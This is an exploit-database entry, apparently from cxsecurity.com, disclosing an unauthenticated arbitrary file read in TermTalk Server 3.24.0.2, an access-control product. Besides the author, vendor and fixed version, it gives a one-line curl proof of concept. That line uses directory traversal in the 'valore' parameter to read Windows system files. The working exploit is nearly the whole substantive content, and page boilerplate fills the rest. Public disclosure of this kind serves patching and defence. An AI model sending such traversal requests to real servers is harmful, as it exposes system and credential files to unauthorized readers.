TermTalk Server 3.24.0.2 Arbitrary File Read

2022.01.05
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

# Exploit Title: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated) # Date: 03/01/2022 # Exploit Author: Fabiano Golluscio @ Swascan # Vendor Homepage: https://www.solari.it/it/ # Software Link: https://www.solari.it/it/solutions/other-solutions/access-control/ # Version: 3.24.0.2 # Fixed Version: 3.26.1.7 # Reference: https://www.swascan.com/solari-di-udine/ POC curl http://url:port/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top